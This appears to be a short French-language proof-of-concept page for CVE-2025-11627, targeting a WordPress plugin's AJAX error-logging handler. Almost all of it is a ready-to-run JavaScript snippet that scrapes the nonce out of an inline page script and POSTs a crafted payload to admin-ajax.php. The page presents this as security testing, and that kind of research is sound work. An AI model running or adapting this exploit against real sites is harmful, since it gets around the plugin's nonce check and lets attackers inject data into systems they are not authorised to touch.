
Exploit de preuve de concept pour CVE-2025-11627 ciblant un gestionnaire AJAX d'un plugin WordPress avec extraction de nonce et livraison de payload pour les tests de sécurité.
Envoyez une requête construite au gestionnaire AJAX avec le nonce extrait.
(() => {
// 1) trouver le script en ligne qui contient l'URL AJAX
const s = [...document.scripts].find(sc => sc.textContent.includes('bill_minozzi_js_error_catched'));
if (!s) { console.error('Script with ajax URL not found. Is wp_head() present?'); return; }
// 2) extraire le nonce de "...admin-ajax.php?action=bill_minozzi_js_error_catched&_wpnonce=XXXX"
const m = s.textContent.match(/admin-ajax\.php\?action=bill_minozzi_js_error_catched&_wpnonce=([A-Za-z0-9_-]+)/);
if (!m) { console.error('Nonce not found in inline script'); return; }
const NONCE = m[1];
// 3) envoyer une charge utile minimale (preuve sûre)
fetch('/wordpress/wp-admin/admin-ajax.php', {
method: 'POST',
headers: {'Content-Type':'application/x-www-form-urlencoded'},
body:
'action=bill_minozzi_js_error_catched' +
'&_wpnonce=' + encodeURIComponent(NONCE) +
'&bill_js_error_catched=' + encodeURIComponent('Message: X - URL: http://x.js - Line: 1')
}).then(r => r.text()).then(t => console.log('Response:', t));
})();